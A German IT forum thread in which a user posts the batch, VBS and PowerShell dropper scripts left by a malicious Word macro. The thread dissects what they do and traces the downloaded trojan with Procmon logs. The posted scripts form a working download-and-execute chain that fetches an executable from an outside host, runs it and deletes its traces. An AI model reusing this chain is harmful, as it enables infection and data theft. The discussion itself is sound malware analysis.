xaero1982
Goto Top

Kann mir das jemand erläutern?

Moin,

heute ist ne Mail reingetrudelt - ein "Fax" welches man mit Word öffnen sollte und die Makros aktivieren sollte.

-> VM an -> Office drauf -> Spaß face-smile

Im Ordner C:\Windows\Temp wurden folgende Dateien angelegt:

444.exe -> Details: Gpg4Win V.2.2.2.4 Copyright 2008 g10 Code GmbH 546kb
adobeacd-update.bat

@echo off
ping 1.1.2.2 -n 2
cscript.exe "c:\windows\temp\adobeacd-update.vbs"  
exit

adobeacd-update.vbs
currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
caisudkasdknadsklasdjaklajksjklasdkjlajkalkadsjasjklajklah38e = "231"  
Set objFSO=CreateObject("Scripting.FileSystemObject")  
currentFile = "c:\windows\temp\adobeacd-update.ps1"  
caisudkh38e = "231"  
quid8hiqje = "231"  
Set objShell = CreateObject("Wscript.shell")  
caksjhdjaskdhakjshdjkashkjdhaksjdhkjashdjkashdjkashdjkashdjakdahjksd = "231"  
objShell.run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true  
caisudkhlkasdjkdlskjldsajkldasjkdsajkldasklsadklwqiodiqwjd38e = "231"  

adobeacd-update.ps1
$hashroot = '47-ab-cd-f5-8f-bf-f9-1f-94-65-51-7b-96-ea-13-d3';  
$hash = '0';  
$down = New-Object System.Net.WebClient;
$url  = 'http://idtvietnam.vn/images/ork.exe';  
$hashasd = 'asdjäæûôîâäëôûîâäôûkhasjkdhajkshdiusakhdsakhdkjashd';  
$file = 'c:\windows\temp\444.exe';  
$hashasd = 'asdjkhasjkdhajkshdiusakhdsakhdkjashd';  
$down.DownloadFile($url,$file);
$ScriptDir = $MyInvocation.ScriptName;
$someFilePath = 'c:\windows\temp\' + '444.exe';  
$vbsFilePath = 'c:\windows\temp\' + 'adobeacd-update.vbs';  
$batFilePath = 'c:\windows\temp\' + 'adobeacd-update.bat';  
$psFilePath = 'c:\windows\temp\' + 'adobeacd-update.ps1';  
Start-Sleep -s 10;
cmd.exe /c  'c:\windows\temp\444.exe';       
$file1 = gci $vbsFilePath -Force
$file2 = gci $batFilePath -Force
$file3 = gci $psFilePath -Force
$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden
$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden
$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden
If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }
If (Test-Path $batFilePath){ Remove-Item $batFilePath }
If (Test-Path $someFilePath){ Remove-Item $someFilePath }
Remove-Item $MyINvocation.InvocationName

Was genau macht das?

Content-ID: 254187

Url: https://administrator.de/forum/kann-mir-das-jemand-erlaeutern-254187.html

Ausgedruckt am: 07.04.2025 um 10:04 Uhr

colinardo
Lösung colinardo 07.11.2014, aktualisiert am 10.11.2014 um 18:13:06 Uhr
Goto Top
Hi Xaero,
die Batch ruft das VBS auf welches wiederum das Powershell-Script aufruft.
Das Powershell-Script macht dann folgendes:

Es lädt eine Datei von einer Webseite herunter 'http://xxxxxxxx/ork.exe' die es unter 'c:\windows\temp\444.exe' auf dem Rechner speichert. Dann führt es die Datei 444.exe in einer Konsole aus (der Virus/Malware/ etc.). Dann versteckt es die 3 Scripte (bat/vbs/ps1) indem es den Dateien das Hidden-Attribut verpasst und löscht zum Schluss sich selber und die anderen Scripte um die Spuren zu verwischen.

Die zwischengeschobenen Hashes etc. sind nur Verwirrspiel, die haben keine Verwendung im Script, und sollen den Otto-Normaluser wohl verwirren oder den eigentlichen Code "verschleiern" face-big-smile. Die haben sich absolut keine Mühe gegeben, das geht wesentlich besser ... das waren dann wohl Script-Kiddie-Anfänger !

Grüße Uwe

p.s. ich hoffe die kleinen Vietnamesen tanzen jetzt nicht noch aus deiner VM hinaus face-smile
Xaero1982
Xaero1982 07.11.2014 um 22:40:59 Uhr
Goto Top
Also so wirklich klar was die 444.exe macht ist mir nicht... jedenfalls hats die VM zerlegt face-smile

VirtualMachine sagt: Ein schwerwiegender Fehler ist aufgetreten, und die Ausführung der vM wurde unterbrochen.

-> Logs gucken

Kann man rausbekommen was die 444.exe macht?

Danke erst mal face-smile

Grüße
colinardo
colinardo 07.11.2014 aktualisiert um 22:46:14 Uhr
Goto Top
Zitat von @Xaero1982:
Kann man rausbekommen was die 444.exe macht?
  • Olydbg anwerfen
  • File durch den Disassembler jagen
  • Gleichzeitig Procmon laufen lassen

Was für lange Winterabende face-wink

Schönes Wochenende
Grüße Uwe
Xaero1982
Xaero1982 07.11.2014 aktualisiert um 22:57:44 Uhr
Goto Top
Procmon mit welchem Filter?

Danke, dir auch face-smile

Grüße

und vor allem was mach ich damit? face-smile also mit dem Ollydbg
colinardo
colinardo 07.11.2014 aktualisiert um 22:56:39 Uhr
Goto Top
Zitat von @Xaero1982:
Procmon mit welchem Filter?
Na zuerst mal auf den Prozess 444.exe, später dann auf andere je nachdem was das Teil so macht ...
Xaero1982
Xaero1982 07.11.2014 um 23:16:51 Uhr
Goto Top
Offenbar macht der ne Menge.

Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.

Insgesamt 6149 Zugriffe.
colinardo
colinardo 08.11.2014 aktualisiert um 08:54:02 Uhr
Goto Top
Zitat von @Xaero1982:

Offenbar macht der ne Menge.

Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.

Insgesamt 6149 Zugriffe.
wenn du jetzt noch nach Category = "Write" filterst siehst du was er eventuell verändert. Könnte aber auch ein einfacher Datendieb sein der in Dateien und Registry-Einträgen nach Passwörtern scannt und diese an den CC-Server sendet.
Lad das Teil doch einfach mal auf VirusTotal.com hoch, ob es schon in den Definitionen der AntiVirus-Hersteller verzeichnet ist.

Aber wahrscheinlich willst du damit nur etwas üben, gelle face-smile
Xaero1982
Xaero1982 08.11.2014 um 09:42:43 Uhr
Goto Top
Schau ich mal mit dem Filter... danke face-smile

Naja ich will eigentlich wissen was der Spaß macht... üben... joa auch das face-smile

https://www.virustotal.com/de/file/59b2bc1bdf983b47bad926ef3808f9493c100 ...
Xaero1982
Xaero1982 08.11.2014 um 10:04:04 Uhr
Goto Top
Das kam bei raus:

"Time of Day","Process Name","PID","Operation","Path","Result","Detail"  
"09:53:33,1463901","ork.exe","2380","RegSetValue","HKLM\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Log File Max Size","SUCCESS","Type: REG_SZ, Length: 12, Data: 65536"  
"09:53:33,5291740","ork.exe","2380","CreateFile","C:\Users\Administrator\Desktop\","NAME INVALID","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, Write, AllocationSize: 0"  
"09:53:38,4024746","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Read, Disposition: Create, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: None, AllocationSize: 0, OpenResult: Created"  
"09:53:38,4027583","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Write, AllocationSize: 0, OpenResult: Overwritten"  
"09:53:38,4028118","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 0, Length: 9, Priority: Normal"  
"09:53:38,4029443","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 9, Length: 8"  
"09:53:38,4029526","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 9, Length: 8, Priority: Normal"  
"09:53:38,4029708","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 17, Length: 9"  
"09:53:38,4029772","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 17, Length: 9, Priority: Normal"  
"09:53:38,4029884","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 26, Length: 1"  
"09:53:38,4029945","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 26, Length: 1, Priority: Normal"  
"09:53:38,5466385","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0"  
"09:53:38,5466503","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer","NAME NOT FOUND",""  
"09:53:38,5466579","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride","NAME NOT FOUND",""  
"09:53:38,5466637","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL","NAME NOT FOUND",""  
"09:53:38,5466692","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect","NAME NOT FOUND",""  
"09:53:38,5468236","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings","SUCCESS","Type: REG_BINARY, Length: 56, Data: 46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"  
"09:54:03,4389855","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Installer\Products\B808096432\LP","SUCCESS","Type: REG_SZ, Length: 100, Data: C:\Users\ADMINI~1\AppData\Local\Temp\1\L808096432"  
colinardo
colinardo 08.11.2014 aktualisiert um 12:42:58 Uhr
Goto Top
dann schau mal was das Teil in die Temp-Datei tmp74A4.tmp schreibt, ich vermute es dupliziert sich als Backup.
Dann modifiziert es noch die Proxy-Einstellungen, um dann wahrscheinlich den Traffic über eine lokal gestarteten Proxy zu leiten der wiederum den Internet-Traffic zu den Tätern umleitet, wo diese dann Passwörter abfischen.

Aber wie gesagt, eine tiefgreifende Analyse bedeutet auf allen Schienen zu Monitoren, auch mit Wiresharkt den Netzwerktraffic zu beobachten.

Deshalb ist eine vollständige Analyse für uns hier sehr schwer.
Xaero1982
Xaero1982 08.11.2014 um 18:00:08 Uhr
Goto Top
Also damit kann sich wohl niemand nen Ei machen:

LP=C:\Users\ADMINI~1\AppData\Local\Temp\L808096432
[2]
D=0
OS=Windows Server 2012  / 64 bit
FS=NTFS
VID=808096432
M=1
[1]
ID=101
D=08.11.2014
T=17:49:29
CPID=3776
CFN=C:\Users\Administrator\Desktop\ork.exe
PPID=3096
PFN=cmd.exe
CDR=C:\Users\Administrator\Desktop
CUSR=HOME\administrator
EUSR=HOME\administrator
LVL=HIGH

Nach Hause telefoniert da irgendwie nix...

Link zum runterladen der exe is oben xD
colinardo
colinardo 08.11.2014, aktualisiert am 10.11.2014 um 17:00:09 Uhr
Goto Top
Das ist ein Trojaner der sensitive Informationen über sein Opfer stiehlt:
http://kb.eset.com/esetkb/index?page=content&id=SOLN3471

Win32/Rovnix is a trojan that steals sensitive information. The trojan attempts to send gathered information to a remote machine. It uses techniques common among rootkits.
Die Übermittlung muss nicht immer direkt stattfinden, das lässt sich meistens erst sagen wenn man den über einen längeren Zeitraum beobachtet. Es kann auch sein das der Server schon vom
Netz genommen wurde. Ausserdem könnte er es ja über einen lokal installierten Proxy verschleiern . Das scheinen Grundlegende Infos über das System zu sein die dann irgendwann an den CC-Server geschickt werden.
Xaero1982
Xaero1982 08.11.2014 um 21:19:37 Uhr
Goto Top
Danke für den Link:

Win32/Rovnix not found
C.R.S.
C.R.S. 10.11.2014 um 16:54:46 Uhr
Goto Top
Zitat von @Xaero1982:

Nach Hause telefoniert da irgendwie nix...

DNS-Request übersehen! optimalnewbie.co.uk ist aber schon länger trocken gelegt.
Xaero1982
Xaero1982 10.11.2014 um 18:12:30 Uhr
Goto Top
Könntest du recht haben, dass mir da sowas über den Weg gelaufen ist...